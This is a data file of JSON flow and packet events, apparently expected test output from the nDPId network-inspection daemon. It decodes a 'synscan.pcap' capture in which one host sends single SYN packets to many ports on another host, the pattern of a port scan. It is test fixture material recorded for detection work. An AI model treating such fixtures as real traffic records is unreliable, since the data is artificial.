+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5noAACsGNvisEAAIQA2GNIzSBa\/dUoMYAAAAAGACEAAi4AAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAshFYAACUGnxysEAAIQA2GNIzSA\/HdUoMYAAAAAGACCAAsngAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAset0AACcGppWsEAAIQA2GNIzSJxHdUoMYAAAAAGACEAABfgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsAccAACkGHaysEAAIQA2GNIzSIGTdUoMYAAAAAGACCAAQKwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAs5RsAACYGPVesEAAIQA2GNIzS2TDdUoMYAAAAAGACDABTXgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059409,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059409,"pkt":"ACYLMQczACWzv5HuCABFAAAsSPQAADYGyX6sEAAIQA2GNIzSTiXdUoMYAAAAAGACDADeaQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1036,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswj8AAC4GWDOsEAAIQA2GNIzSBAzdUoMYAAAAAGACDAAogwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQjcAACgG3jusEAAIQA2GNIzSF9rdUoMYAAAAAGACBAActQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs9woAADcGGmisEAAIQA2GNIzSHCHdUoMYAAAAAGACEAAMbgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/ToAADsGEDisEAAIQA2GNIzSBB3dUoMYAAAAAGACEAAkcgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgcAACoGcGusEAAIQA2GNIzSgAbdUoMYAAAAAGACDACsiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsKF4AAC0G8xSsEAAIQA2GNIzSC7bdUoMYAAAAAGACCAAk2QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAszEUAADsGQS2sEAAIQA2GNIzSB\/\/dUoMYAAAAAGACEAAgkAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsezgAADMGmjqsEAAIQA2GNIzSIAjdUoMYAAAAAGACEAAIhwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswn0AACsGWvWsEAAIQA2GNIzSA3jdUoMYAAAAAGACEAAlFwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAso9kAAC8GdZmsEAAIQA2GNIzShwzdUoMYAAAAAGACEAChggAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAACcGzvisEAAIQA2GNIzSBLHdUoMYAAAAAGACEAAj3gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs7YEAADYGJPGsEAAIQA2GNIzSIyvdUoMYAAAAAGACDAAJZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsph0AACwGdlWsEAAIQA2GNIzSDSfdUoMYAAAAAGACBAAnaAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsJeMAADAG8o+sEAAIQA2GNIzSCJTdUoMYAAAAAGACBAAr+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsyUAAADAGTzKsEAAIQA2GNIzSCEndUoMYAAAAAGACBAAsRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsBxkAACgGGVqsEAAIQA2GNIzSFtrdUoMYAAAAAGACBAAdtQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAs6FYAADkGJxysEAAIQA2GNIzSHVjdUoMYAAAAAGACCAATNwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsEFQAADgGAB+sEAAIQA2GNIzSBEjdUoMYAAAAAGACBAAwRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 